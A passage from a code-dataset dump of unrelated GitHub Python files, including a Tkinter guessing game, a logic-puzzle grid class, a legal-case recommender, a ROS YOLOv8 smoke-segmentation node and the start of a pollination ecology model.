The value stored by the user is stored in this.\r\n\r\n\r\ndef comp(): #Is a function which is used to compare the player's input and the computers number\r\n global score #It also increments the score variable after every attempt by the player\r\n if no < choice.get():\r\n Label1 = Label(root, text=\" Guess a lower Number \", #Label used to give the player a hint.\r\n relief=RIDGE, font=('Roboto', 15))\r\n Label1.place(relx=0.5, rely=0.6, anchor=CENTER)\r\n score += 1\r\n\r\n elif no > choice.get():\r\n Label2 = Label(root, text=\" Guess a Higher Number\", #Label used to give the player a hint.\r\n relief=RIDGE, font=('Roboto', 15), )\r\n Label2.place(relx=0.5, rely=0.6, anchor=CENTER)\r\n score += 1\r\n else:\r\n Label3 = Label(root, text=\"Damn🔥🔥.Right Answer!!\", #Label used to print if the player got the right answer.\r\n relief=RIDGE, font=('Roboto', 15))\r\n Label3.place(relx=0.5, rely=0.6, anchor=CENTER)\r\n Label5 = Label(root, text=score,\r\n relief=RIDGE, font=('Roboto', 15)) #Label used to print the final score of the player.\r\n Label5.place(relx=0.57, rely=0.5, anchor=CENTER)\r\n\r\n\r\ndef resart(): #Function used to restart the game/start a new game with new score.\r\n global no\r\n global score\r\n no = random.randint(1, 100) #Changing the computer's number by selecting any random number between 1-100.\r\n score = 0 #Resetting the score to zero.\r\n Label6 = Label(root, text=score,#Printing the score back to 0.\r\n relief=RIDGE, font=('Roboto', 15))\r\n Label6.place(relx=0.55, rely=0.5, anchor=CENTER)\r\n return\r\n\r\n\r\nLabelhead = Label(root, text=\"Enter any Number between 1 to 100 \", #Instruction for the player.\r\n relief=RIDGE, font=('Roboto', 20))\r\nLabelhead.place(relx=0.5, rely=0.05, anchor=CENTER)\r\n\r\nLabel4 = Label(root, text=\"Score = \", #\"Score =\" being printed in the window.\r\n relief=RIDGE, font=('Roboto', 15))\r\nLabel4.place(relx=0.5, rely=0.5, anchor=CENTER)\r\n\r\nent1 = Entry(root, textvariable=choice, width=3, #Entry box where the user inputs his/her guess.\r\n font=('Roboto', 50), relief=GROOVE)\r\nent1.place(relx=0.5, rely=0.275, anchor=CENTER)\r\n\r\nmyButton1 = Button(root, text=\"GUESS\", padx=35, pady=15, command=comp) #Button which calls the \"comp()\" function.\r\nmyButton1.place(relx=0.5, rely=0.8, anchor=CENTER)\r\n\r\nmyButton2 = Button(root, text=\"Quit\", padx=45, #Button which terminates the window.\r\n pady=15, command=root.destroy)\r\nmyButton2.place(relx=0.75, rely=0.8, anchor=CENTER)\r\n\r\nmyButton3 = Button(root, text=\"Play Again\", padx=35, #Button which calls the \"restart()\" function.\r\n pady=15, command=resart)\r\nmyButton3.place(relx=0.25, rely=0.8, anchor=CENTER)\r\n\r\nroot.mainloop() #Calling the mainloop of Tk\r\n\r\n#Coded by Aman Rehan, 12001782","repo_name":"Gauravsingh23/Mini-Games","sub_path":"Guess.py","file_name":"Guess.py","file_ext":"py","file_size_in_byte":4047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71250863506","text":"from constants import *\nfrom grid import Grid\n\nclass LineGrid(Grid):\n def __init__(self, data_string):\n Grid.__init__(self, data_string)\n self.precalc_given_adjacencies()\n self.precalc_junctions()\n self.precalc_junction_adjacencies()\n\n def precalc_given_adjacencies(self):\n self.given_adjacencies = {}\n for pos in self.givens.keys():\n self.given_adjacencies[pos] = self._given_adjacencies(pos)\n\n def _adjacencies(self, pos):\n x, y = pos\n adjacencies = [\n (x-1, y-1),\n (x-1, y+1),\n (x+1, y-1),\n 
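The adjacency lists being assembled in the LineGrid record below live in an interleaved coordinate system: junctions sit at (even, even) positions, cell centers at (odd, odd), and edges at positions whose coordinate sum is odd, with vertical edges on even x. A tiny standalone illustration for a 2x2 puzzle, whose display grid is 5x5:

def is_vertical(pos):                 # mirrors LineGrid.is_vertical
    x, y = pos
    assert (x + y) % 2 == 1
    return x % 2 == 0

edges = [(x, y) for x in range(5) for y in range(5) if (x + y) % 2 == 1]
vertical = [p for p in edges if is_vertical(p)]
horizontal = [p for p in edges if not is_vertical(p)]
assert len(edges) == 12               # 6 vertical + 6 horizontal edges
assert len(vertical) == len(horizontal) == 6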
(x+1, y+1),\n ]\n if LineGrid.is_vertical(pos):\n adjacencies.extend([\n (x, y-2),\n (x, y+2),\n ])\n else: # horizontal\n adjacencies.extend([\n (x-2, y),\n (x+2, y),\n ])\n return self.cull_bounds(adjacencies)\n\n def _given_adjacencies(self, given_pos):\n x, y = given_pos\n x = x * 2 + 1\n y = y * 2 + 1\n return self.cull_bounds([(x-1, y),\n (x+1, y),\n (x, y-1),\n (x, y+1)])\n\n NODE_CHAR = '+'\n VERTICAL_CHAR = '|'\n HORIZONTAL_CHAR = '-'\n UNKNOWN_CHAR = ' '\n\n def translate_data(self, data_dict):\n self.data = {} # lines data\n self.givens = {}\n self.junction_givens = {}\n data_values = data_dict.values()\n if (LineGrid.NODE_CHAR not in data_values and\n LineGrid.VERTICAL_CHAR not in data_values):\n self.translate_data_compact(data_dict)\n return\n # full representation with nodes and lines\n assert self.x_size % 2 == 1\n assert self.y_size % 2 == 1\n self.x_size = (self.x_size - 1) // 2\n self.y_size = (self.y_size - 1) // 2\n for pos in self.iter_checker():\n c = data_dict.get(pos)\n if c == LineGrid.VERTICAL_CHAR or c == LineGrid.HORIZONTAL_CHAR:\n self.data[pos] = BLACK\n elif c == self.CHARS[WHITE]:\n self.data[pos] = WHITE\n else:\n self.data[pos] = UNKNOWN\n # space givens\n for x in range(self.x_size):\n for y in range(self.y_size):\n pos = x, y\n x = x * 2 + 1\n y = y * 2 + 1\n c = data_dict.get((x, y))\n num = self.RCHARS.get(c)\n if num in GIVENS:\n self.givens[pos] = num\n # junction givens\n for jx in range(self.x_size + 1):\n for jy in range(self.y_size + 1):\n pos = jx * 2, jy * 2\n c = data_dict.get(pos)\n if c is not None and c != LineGrid.NODE_CHAR:\n self.junction_givens[(jx, jy)] = c\n\n def translate_data_compact(self, data_dict):\n for pos, value in data_dict.items():\n c = data_dict.get(pos)\n num = self.RCHARS.get(c)\n if num in GIVENS:\n self.givens[pos] = num\n for x, y in self.iter_checker():\n self.data[(x, y)] = UNKNOWN\n\n def __repr__(self):\n display_x_size = (self.x_size) * 2 + 1\n display_y_size = (self.y_size) * 2 + 1\n char_grid = [[' '] * display_x_size for i in range(display_y_size)]\n # place nodes\n for x in range(self.x_size + 1):\n for y in range(self.y_size + 1):\n char = self.junction_givens.get((x, y))\n if char is None:\n char = LineGrid.NODE_CHAR\n char_grid[y * 2][x * 2] = char\n # show given numbers\n for key, value in self.givens.iteritems():\n x, y = key\n x = x * 2 + 1\n y = y * 2 + 1\n char_grid[y][x] = self.CHARS[value]\n # show lines\n for pos, color in self.data.items():\n x, y = pos\n if color == WHITE:\n char_grid[y][x] = self.CHARS[WHITE]\n elif color == BLACK:\n if LineGrid.is_vertical(pos):\n char_grid[y][x] = LineGrid.VERTICAL_CHAR\n else:\n char_grid[y][x] = LineGrid.HORIZONTAL_CHAR\n return '\\n'.join(''.join(line) for line in char_grid)\n\n def is_vertical(position):\n x, y = position\n assert((x + y) % 2 == 1)\n return x % 2 == 0\n is_vertical = staticmethod(is_vertical)\n\n def iter_checker(self):\n for x in range(self.x_size * 2 + 1):\n for y in range(self.y_size * 2 + 1):\n if (x + y) % 2 == 1: # odd checkerboard pattern\n yield (x, y)\n\n def adjacent_givens(self, position):\n x, y = position\n if LineGrid.is_vertical(position):\n givens = [(x-1, y), (x+1, y)]\n else: # horizontal\n givens = [(x, y-1), (x, y+1)]\n givens = [((gx - 1) // 2, (gy - 1) // 2) for gx, gy in givens]\n return self.cull_bounds_givens(givens)\n\n def precalc_junctions(self):\n self.junctions = []\n for x in range(self.x_size + 1):\n for y in range(self.y_size + 1):\n self.junctions.append((x, y))\n\n def 
precalc_junction_adjacencies(self):\n self.junction_adjacencies = {}\n for jpos in self.junctions:\n self.junction_adjacencies[jpos] = self._junction_adjacencies(jpos)\n \n def _junction_adjacencies(self, pos):\n x, y = pos\n x = x * 2\n y = y * 2\n return self.cull_bounds([(x-1, y),\n (x+1, y),\n (x, y-1),\n (x, y+1)])\n\n def cull_bounds_givens(self, position_list):\n return [pos for pos in position_list if pos in self.givens.keys()]\n\n\n","repo_name":"christian-oudard/logic-puzzle-toolkit","sub_path":"linegrid.py","file_name":"linegrid.py","file_ext":"py","file_size_in_byte":5871,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"42113376865","text":"from collections import deque\r\n\r\nquantity_liters = int(input())\r\n\r\npeople = deque()\r\n\r\nwhile True:\r\n command = input()\r\n if command == 'Start':\r\n break\r\n else:\r\n name = command\r\n people.append(name)\r\n\r\n\r\nwhile True:\r\n command = input()\r\n if command.isdigit():\r\n litters_to_drink = int(command)\r\n person = people.popleft()\r\n if litters_to_drink <= quantity_liters:\r\n quantity_liters -= litters_to_drink\r\n print(f'{person} got water')\r\n else:\r\n print(f'{person} must wait')\r\n elif command.startswith(\"refill \"):\r\n liters_to_add = int(command.split(' ')[-1])\r\n quantity_liters += liters_to_add\r\n elif command == 'End':\r\n break\r\n\r\nprint(f'{quantity_liters} liters left')","repo_name":"AlexanderIvanofff/Python-OOP","sub_path":"List as Stacks and Queues/water_dispenser.py","file_name":"water_dispenser.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12423881767","text":"def solution(answers):\n cnt = [0] * 3\n p = [[0] * len(answers) for _ in range(3)]\n ar2 = [1, 3, 4, 5]\n ar3 = [3, 1, 2, 4, 5]\n for i in range(len(answers)):\n p[0][i] = (i + 1) % 5 if (i + 1) % 5 else 5\n p[1][i] = ar2[(int)(i / 2) % 4] if i % 2 else 2\n p[2][i] = ar3[(int)(i / 2) % 5]\n for j in range(3):\n if p[j][i] == answers[i]:\n cnt[j] += 1\n m = max(cnt)\n answer = [i + 1 for i, v in enumerate(cnt) if v == m]\n return answer\n\nanswers = [1, 3, 2, 4, 2]\nprint(solution(answers))\n","repo_name":"raonsol/ps","sub_path":"programmers/brute_force/moak_exam.py","file_name":"moak_exam.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40827761241","text":"import argparse\nimport json\nimport os\nimport threading\n\nimport pandas as pd\n\nfrom OpenHINE.train import model_main\nfrom execute_graph_query import SPARQLquery\nfrom process_input_caseid import process_id\nfrom recommend import recommend\n\nBASE_PATH = '/Users/xinyu/Documents/Dissertation/LegalWeb'\nEMBEDDING_PATH = BASE_PATH + \"/OpenHINE/output/embedding/MetaGraph2vec/test_node.txt\"\n\n\ndef init_para():\n parser = argparse.ArgumentParser(description=\"LegalWeb\")\n parser.add_argument('-i', '--input', default='2021_IEHC_683', type=str, help=\"Input content\")\n case_args = parser.parse_args()\n return case_args\n\n\nif __name__ == '__main__':\n args = init_para()\n # check if the new input in database. 
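The moak_exam.py record above rebuilds each student's repeating answer pattern with index arithmetic. An equivalent and arguably clearer formulation cycles the literal patterns with itertools.cycle; same patterns, same example input, same result:

from itertools import cycle

def solution(answers):
    patterns = [[1, 2, 3, 4, 5],
                [2, 1, 2, 3, 2, 4, 2, 5],
                [3, 3, 1, 1, 2, 2, 4, 4, 5, 5]]
    scores = [sum(a == b for a, b in zip(answers, cycle(p))) for p in patterns]
    best = max(scores)
    return [i + 1 for i, s in enumerate(scores) if s == best]

assert solution([1, 3, 2, 4, 2]) == [1, 2, 3]   # all three tie at 2 correct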
If exist: directly recommend; else process and train\n sql = SPARQLquery(\"http://localhost:7200/repositories/LegalWeb\")\n\n # query_neutral = args.input\n query_neutral = '2020_IECA_184'\n\n # not exist: 2020_IECA_183 ;\n # exist: 2020_IECA_159 (topic 6)/2022_IEHC_141 (topic 4);\n # 2022_IEHC_393 (topic 3) / 2022_IEHC_83 (topic 2)\n # 2022_IEHC_167 (topic 5)\n # 2020_IECA_184 (topic 8)/2021_IECA_1 (topic 10);\n # 2021_IECA_322 (topic 1); 2021_IECA_248 (topic 9)\n # 2021_IEHC_773 (topic 7)\n query_case = sql.query_case_exist(query_neutral)\n if query_case:\n print('Case exist', query_case)\n else:\n print('Case not exist')\n\n print('--- Start processing ---')\n query_case, dic_results, nlp_results = process_id(query_neutral)\n print(\"case id:\", query_case)\n print(\"dic results:\", dic_results)\n print(\"nlp results:\", nlp_results)\n print('--- End processing ---\\n\\n')\n\n print('--- Start inserting ---')\n sql_ = SPARQLquery(\"http://localhost:7200/repositories/LegalWeb/statements\")\n r = sql_.insert_new_case_info(dic_results)\n # r = sql_.delete_new_case_info(dic_results)\n print(r)\n print('--- End inserting ---\\n\\n')\n\n print('--- Start Training ---')\n os.system(\"python OpenHINE/train.py -m MetaGraph2vec -d test\")\n t = threading.Thread(target=model_main)\n t.start()\n t.join()\n print('--- End Training ---\\n\\n')\n\n print(\"--- Start recommending ---\")\n with open(EMBEDDING_PATH, mode='r', encoding='utf-8') as f:\n line = f.readlines()\n try:\n if len(line[0].split(\" \")) == 2:\n line = line[1:]\n f = open(EMBEDDING_PATH , mode='w', encoding='utf-8')\n f.writelines(line)\n f.close()\n except Exception as e:\n print(e)\n embedding = pd.read_table(EMBEDDING_PATH, names=list(range(0, 65, 1)), sep=' ')\n recommendation, evaluation = recommend(embedding, query_case)\n print(recommendation)\n print(evaluation)\n if recommendation:\n info = sql.query_recommendation(recommendation)\n with open(BASE_PATH + \"/recommendation.json\", \"w\") as write_file:\n json.dump(info, write_file, indent=4)\n print('--- End recommending ---\\n\\n')\n","repo_name":"kongkongYuki/YuXin","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32949224823","text":"#!/usr/local/bin/python3.10 \n# license removed for brevity\n\nfrom operator import truediv\nfrom re import sub\nimport rospy\nfrom rospy.client import init_node\nfrom sensor_msgs.msg import Image\nfrom vision_msgs.msg import Detection2D\nfrom sensor_msgs.msg import TimeReference\nfrom std_msgs.msg import String\nimport numpy as np\nimport cv2\nimport os, re\n# import PySpin\nimport sys, datetime\nimport argparse\nfrom pathlib import Path\nimport time\nimport torch\nfrom scipy.stats import linregress\n\nfrom ultralytics import YOLO\n\nprint(f\"Torch setup complete. 
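main.py above strips a word2vec-style "<count> <dim>" header from the embedding file by reading all lines, slicing, and rewriting the file in place. A sketch of an alternative that peeks at the first line and lets pandas skip it instead, leaving the file untouched; the function name is hypothetical and the 64-dimension layout is taken from the read_table call above:

import pandas as pd

def load_embeddings(path, dim=64):
    # hypothetical helper, reproducing the 65-column read above
    with open(path, encoding='utf-8') as f:
        first = f.readline()
    skip = 1 if len(first.split(' ')) == 2 else 0   # word2vec-style header?
    return pd.read_table(path, sep=' ', header=None, skiprows=skip,
                         names=list(range(dim + 1)))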
Using torch {torch.__version__} ({torch.cuda.get_device_properties(0).name if torch.cuda.is_available() else 'CPU'})\")\n\n\n#global publisher and boundingbox\nglobal pub, box, video, timelog\n\n#global initialized variables for segmentation model\nglobal imgsz, model, device, names, max_det, max_delay\n#global engine, half\n\n\n#------------------------OPTIONS---------------------#\nmax_delay = 0.5 # [seconds] delay between last detection and current image after which to just drop images to catch up\n\nconf_thres=0.25 # originally 0.4 # confidence threshold\niou_thres=0.45 # NMS IOU threshold\nmax_det=100 # maximum detections per image\nimgsz = (352,448) # previously [352,448] # scaled image size to run inference on #inference size (height, width) \ndevice='cpu' # device='cuda:0'\nretina_masks=True\n\nsave_txt = False\nsave_img = False \nsave_crop = False \nview_img = True\nhide_labels = False # hide labels\nhide_conf = False # hide confidences\nVIEW_IMG=True\nVIEW_MASK=False\nSAVE_IMG = False\nsave_format = False #'.avi' or '.raw'\n#-----------------------------------------------------#\n\n\ngps_t = 0\n# create saving directory\n# username = os.getlogin( )\ntmp = datetime.datetime.now()\nstamp = (\"%02d-%02d-%02d\" % \n         (tmp.year, tmp.month, tmp.day))\nmaindir = Path('./SavedData')\nruns_today = list(maindir.glob('*%s*_segmentation' % stamp))\nif runs_today:\n    runs_today = [str(name) for name in runs_today]\n    regex = r'run\\d\\d'\n    runs_today = re.findall(regex, ''.join(runs_today))\n    runs_today = np.array([int(name[-2:]) for name in runs_today])\n    new_run_num = max(runs_today)+1\nelse:\n    new_run_num = 1\nsavedir = maindir.joinpath('%s_run%02d_segmentation' % (stamp,new_run_num))\nos.makedirs(savedir) \n\n\n# YOLO paths and importing\nFILE = Path(__file__).resolve()\nYOLOv5_ROOT = FILE.parents[1] / 'scripts/modules/yolov8-seg/yolo-V8' # YOLOv5 root directory\nif str(YOLOv5_ROOT) not in sys.path:\n    sys.path.append(str(YOLOv5_ROOT)) # add YOLOv5_ROOT to PATH\n# print(YOLOv5_ROOT)\nYOLOv5_ROOT = Path(os.path.relpath(YOLOv5_ROOT, Path.cwd())) # relative\n\n\n# labeling text on image\nWHITE = (255, 255, 255)\nfont = cv2.FONT_HERSHEY_SIMPLEX\nfont_size = 1\nfont_color = WHITE\nfont_thickness = 2\n\n\n\ndef imagecallback(img):\n    global pub,box,video,timelog\n    global imgsz, model, device, names\n    box = Detection2D()\n\n    # converting image to numpy array\n    img_numpy = np.frombuffer(img.data,dtype=np.uint8).reshape(img.height,img.width,-1)\n\n    if rospy.Time.now() - img.header.stamp > rospy.Duration(max_delay):\n        #print(\"DetectionNode: dropping old image from detection\\n\")\n        return\n    else:\n        results = model.predict(img_numpy, conf=conf_thres, imgsz=imgsz, iou=iou_thres, max_det=max_det, verbose=False)\n\n        if results[0].masks is not None:\n\n            resize_orig_img = cv2.resize(results[0].orig_img, (len(results[0].masks.data[0][0]), len(results[0].masks.data[0]))) # resizing the original image to the size of mask \n            #cv2.imshow('Original Image', resize_orig_img)\n            #cv2.waitKey(1)\n            #print(f'Resize Image Shape: {resize_orig_img.shape}')\n            #print(f'Resize Image: {resize_orig_img}')\n            #blk = np.zeros(img_numpy.shape)\n\n            max_white_pixels, data_idx = 0, 0\n            x_mean, y_mean = -1, -1\n            for i in range(len(results[0].masks.data)):\n                indices = find_element_indices(results[0].masks.data[i].cpu().numpy(), 1) # pixels belonging to the segmented mask have a corresponding value of 1\n                white_x_mean, white_y_mean, white_pixel_indices = check_white_pixels(indices, resize_orig_img)\n                white_pixel_count = len(white_pixel_indices)\n                
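# note: this selection assumes the smoke plume is the mask containing the most\n                # bright (white) pixels; check_white_pixels() returns the mean row/column of\n                # those pixels, so the published centroid tracks the whitest region of that mask\n                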
if max_white_pixels <= white_pixel_count:\n max_white_pixels = white_pixel_count\n data_idx = i\n x_mean, y_mean = white_x_mean, white_y_mean\n \n if x_mean == -1 and y_mean == -1:\n box.bbox.center.x = -1\n box.bbox.center.y = -1\n box.bbox.center.theta = -1\n box.bbox.size_x = -1\n box.bbox.size_y = -1\n pub.publish(box)\n else:\n #print(f'Data List length: ({len(results[0].masks.data[0])}, {len(results[0].masks.data[0][0])})')\n #print(f'Masked Pixels: {mask_count}')\n #white_x_mean, white_y_mean, white_pixel_indices = check_white_pixels(indices, resize_orig_img)\n #print(f'Data List : {find_element_indices(results[0].masks.data[0].cpu().numpy(), 1)}')\n #print(f'Max data Length: {max_mask}')\n #print(f'Data idx: {data_idx}')\n #print(len(indices))\n\n img_mask = results[0].masks.data[data_idx].cpu().numpy()\n img_mask = (img_mask * 255).astype(\"uint8\")\n indices = find_element_indices(img_mask, 255)\n img_mask = cv2.cvtColor(img_mask, cv2.COLOR_GRAY2BGR)\n '''\n x_cord_sum, y_cord_sum = 0, 0\n len_indices = len(indices)\n for i in range(len_indices):\n x_cord_sum = x_cord_sum + indices[i][0]\n y_cord_sum = y_cord_sum + indices[i][1]\n x_mean = int(x_cord_sum / len_indices)\n y_mean = int(y_cord_sum / len_indices)\n '''\n x_mean_norm = x_mean / img_mask.shape[0]\n y_mean_norm = y_mean / img_mask.shape[1]\n #print(img.shape)\n #print(x_mean, y_mean)\n #print(results[0].masks.data[0])\n #print(indices)\n #python_indices = [index for (index, item) in enumerate(programming_languages) if item == \"Python\"]\n if VIEW_MASK:\n img_mask = cv2.circle(img_mask, (y_mean, x_mean), 5, (0, 0, 255), -1)\n cv2.imshow('Mask', img_mask)\n cv2.waitKey(1)\n\n #print(img_numpy.shape)\n #cor_x = (results[0].masks.xy[0][:,0] * (img_numpy.shape[1])).astype(\"int\")\n #cor_x = (results[0].masks.xy[0][:,0]).astype(\"int\")\n #cor_y = (results[0].masks.xy[0][:,1]).astype(\"int\")\n #print(cor_x)\n #blk[cor_y,cor_x] = 255\n\n #wind_h, wind_w = 960, 540\n #cv2.namedWindow('Outline', cv2.WINDOW_NORMAL | cv2.WINDOW_KEEPRATIO)\n #cv2.resizeWindow('Outline', wind_h, wind_w)\n #cv2.imshow('Outline', blk)\n #cv2.waitKey(1)\n \n annotated_frame = results[0].plot() # result is a in which the first element is\n #print(f'Annotataed array: {annotated_frame.shape}')\n #print(f'Index Length: {len(find_pixel_indices(img_mask, [0, 0, 0]))}')\n x_mean = int(x_mean_norm * annotated_frame.shape[0])\n y_mean = int(y_mean_norm * annotated_frame.shape[1])\n annotated_frame = cv2.circle(annotated_frame, (y_mean, x_mean), 10, (255, 0, 0), -1)\n \n if VIEW_IMG:\n wind_h, wind_w = 960, 540\n cv2.namedWindow('Segmentation V8', cv2.WINDOW_NORMAL | cv2.WINDOW_KEEPRATIO) # allow window resize (Linux)\n cv2.resizeWindow('Segmentation V8', wind_h, wind_w)\n cv2.imshow('Segmentation V8', annotated_frame)\n cv2.waitKey(1)\n\n box.header.seq = img.header.seq\n box.header.stamp = img.header.stamp\n box.header.frame_id = ''\n box.source_img = img\n\n box.bbox.center.x = y_mean_norm #object[0].bounding_box[0]\n box.bbox.center.y = x_mean_norm #object[0].bounding_box[1]\n box.bbox.center.theta = 0\n #box.bbox.size_x = object[0].bounding_box[2]\n #box.bbox.size_y = object[0].bounding_box[3]\n #print(f'box.bbox.center.x: {box.bbox.center.x} | box.bbox.center.y: {box.bbox.center.y}')\n pub.publish(box)\n\n text_to_image = 'processed'\n # print('Time after running detection')\n # print('Image %d' % box.source_img.header.seq)\n # print(box.source_img.header.stamp)\n \n # end = time.time()\n # print(\"finished callback for image\", 
img.header.seq,\"in\",end-start, \"seconds \\n\")\n img_numpy = cv2.putText(img_numpy,text_to_image,(10,30),font, font_size, font_color, font_thickness, cv2.LINE_AA)\n\n # adding to time stamp log, every frame\n timelog.write('%d,%f,%f,%f,%f\\n' % (img.header.seq,\n float(img.header.stamp.to_sec()),\n gps_t,\n box.bbox.center.x,\n box.bbox.center.y\n ))\n \n else:\n # print(\"everything -1\")\n box.bbox.center.x = -1\n box.bbox.center.y = -1\n box.bbox.center.theta = -1\n box.bbox.size_x = -1\n box.bbox.size_y = -1\n pub.publish(box)\n\n # viewing/saving images\n savenum=img.header.seq\n\n if SAVE_IMG:\n if save_format=='.raw':\n fid = open(savedir.joinpath('Detection-%06.0f.raw' % savenum),'wb')\n fid.write(img_numpy.flatten())\n fid.close()\n elif save_format == '.avi':\n video.write(img_numpy)\n else:\n cv2.imwrite(str(savedir.joinpath('Detection-%06.0f.jpg' % savenum),img_numpy))\n \n \n\ndef init_detection_node():\n global pub, box, video, timelog\n pub = rospy.Publisher('/segmentation_box', Detection2D, queue_size=1)\n box = Detection2D()\n\n global imgsz, model, device\n \n print('Initializing YOLOv8 segmentation model')\n model= YOLO(YOLOv5_ROOT / 'yolov8-best.pt')\n\n # initializing video file\n if save_format=='.avi':\n codec = cv2.VideoWriter_fourcc('M','J','P','G')\n video = cv2.VideoWriter(str(savedir.joinpath('Detection'+save_format)),\n fourcc=codec,\n fps=20,\n frameSize = (640,480)) # this size is specific to GoPro\n\n # initializing timelog\n timelog = open(savedir.joinpath('Metadata.csv'),'w')\n timelog.write('FrameID,Timestamp_Jetson,Timestamp_GPS,Centroid_x,Centroid_y,Width,Height\\n')\n\n # initializing node\n rospy.init_node('segment_smoke', anonymous=False)\n rospy.Subscriber('front_centre_cam', Image, imagecallback)\n \n rospy.spin()\n\n\n\ndef find_element_indices(arr, target_element=1):\n indices = []\n for row_index, row in enumerate(arr):\n for col_index, element in enumerate(row):\n if element == target_element:\n indices.append((row_index, col_index))\n\n return indices\n\n\n\ndef find_pixel_indices(arr, target_pixel = [0, 0, 0]):\n indices = []\n for row_index, row in enumerate(arr):\n for col_index, element in enumerate(row):\n if (element[0] == target_pixel[0] and element[1] == target_pixel[1] and element[2] == target_pixel[2]):\n indices.append((row_index, col_index))\n\n return indices\n\n\n\ndef check_white_pixels(mask_indices, img):\n threshold = 190 # white smoke\n #cv2.imshow('Original Image', img)\n #cv2.waitKey(1)\n #print(f'Indices:{mask_indices}')\n white_pixel_indices = []\n for idx in mask_indices:\n if (img[idx][0] > threshold) and (img[idx][1] > threshold) and (img[idx][0] > threshold):\n img[idx][0], img[idx][1], img[idx][0] = 0, 0, 0\n white_pixel_indices.append(idx)\n\n x_cord_sum, y_cord_sum = 0, 0\n x, y= [], []\n num_white_pixels = len(white_pixel_indices)\n for i in range(num_white_pixels):\n x_cord_sum = x_cord_sum + white_pixel_indices[i][0]\n x.append(white_pixel_indices[i][0])\n y_cord_sum = y_cord_sum + white_pixel_indices[i][1]\n y.append(white_pixel_indices[i][1])\n\n\n if num_white_pixels != 0:\n x_mean = int(x_cord_sum / num_white_pixels)\n y_mean = int(y_cord_sum / num_white_pixels)\n x_arr, y_arr = np.array(x), np.array(y)\n slope, intercept, r_value, p_value, std_err = linregress(x_arr, y_arr)\n theta = np.degrees(np.arctan(slope))\n print(f'Len of mask_indices: {len(mask_indices)}, Len of white_pixel_indices: {len(white_pixel_indices)}, linear regression: {theta}, {intercept}, {r_value}, {p_value}, {std_err}', end='\\r')\n 
'''\n start_x, start_y= int(y_mean - 100 * np.cos(theta)), int(x_mean - 100 * np.sin(theta))\n end_x, end_y = int(y_mean + 100 * np.cos(theta)), int(x_mean + 100 * np.sin(theta))\n if start_x > end_x and start_y > end_y:\n new_start_x, new_start_y = end_x, end_y\n end_x, end_y = start_x, start_y\n start_x, start_y = new_start_x, new_start_y\n\n img = cv2.line(img, (start_x, start_y), (end_x, end_y), (0, 255, 0), 3)\n '''\n img = cv2.circle(img, (y_mean, x_mean), 3, (255, 0, 0), -1)\n else:\n x_mean = -1\n y_mean = -1\n\n \n\n cv2.imshow('Processed Image', img)\n cv2.waitKey(1)\n\n if len(white_pixel_indices) != 0:\n return x_mean, y_mean, white_pixel_indices\n else:\n return -1, -1, white_pixel_indices\n\n\n\n\nif __name__ == '__main__':\n try:\n init_detection_node()\n except rospy.ROSInterruptException:\n pass","repo_name":"srijanpal07/AutonomousDIHDrone_v2","sub_path":"scripts/segment_v8_test.py","file_name":"segment_v8_test.py","file_ext":"py","file_size_in_byte":14282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33219881782","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# ----------------------------------------------------------------------------\n# Created By: Sjoerd Terpstra\n# Created Date: 08/04/2022\n# ---------------------------------------------------------------------------\n\"\"\" valdovinos.py\n\nImplementation of Valdovinos model (Valdovinos et al. 2013)\n\n\"\"\"\n# ---------------------------------------------------------------------------\nimport copy\nfrom timeit import default_timer as timer\n\nimport numpy as np\n\nfrom pollcomm.ode_solver import solve_ode\nfrom pollcomm.pollcomm_class import PollcommBase\n\n__all__ = [\"ValdovinosModel\"]\n\n\ndef uniform_var(rng, mean, var, size=None):\n low = mean - mean * var\n high = mean + mean * var\n return rng.uniform(low, high, size)\n\n\nclass ValdovinosModel(PollcommBase):\n def __init__(\n self, N_p, N_a, mu=0, connectance=0.15, forbidden=0.3, nestedness=0.3,\n network_type=\"nested\", rng=None, seed=None\n ):\n super().__init__(\n N_p, N_a, mu, connectance, forbidden, nestedness, network_type, rng, seed\n )\n\n # create initial alpha by normalizing network\n self.alpha0 = self.network / self.network.sum(axis=0)\n\n self.p_var = 0.1 # parameter variance for plants\n self.a_var = 0.0001 # parameter variance for pollinators\n\n # fixed parameters\n self.tau = uniform_var(self.rng, 1, self.a_var, size=(self.N_p, self.N_a))\n self.e = uniform_var(self.rng, 0.8, self.p_var, size=(self.N_p, self.N_a))\n self.mu_p = uniform_var(self.rng, 0.002, self.p_var, size=self.N_p)\n self.mu_a = uniform_var(self.rng, 0.01, self.a_var, size=self.N_a)\n self.c = uniform_var(self.rng, 0.2, self.a_var, size=(self.N_p, self.N_a))\n self.b = uniform_var(self.rng, 0.4, self.a_var, size=(self.N_p, self.N_a))\n self.b_max = uniform_var(self.rng, 0.4, self.a_var, size=(self.N_p, self.N_a))\n self.kappa = uniform_var(self.rng, 0.4, self.a_var, size=(self.N_p, self.N_a))\n self.g = uniform_var(self.rng, 0.4, self.p_var, size=self.N_p)\n self.u = uniform_var(self.rng, 0.002, self.p_var, size=self.N_p)\n self.w = uniform_var(self.rng, 1.2, self.p_var, size=self.N_p)\n self.beta = uniform_var(self.rng, 0.2, self.p_var, size=self.N_p)\n self.phi = uniform_var(self.rng, 0.04, self.p_var, size=self.N_p)\n self.G = uniform_var(self.rng, 2, self.a_var, size=self.N_a)\n self.K = uniform_var(self.rng, 20, self.a_var, size=self.N_a)\n\n def __repr__(self):\n return \"VM\"\n\n def 
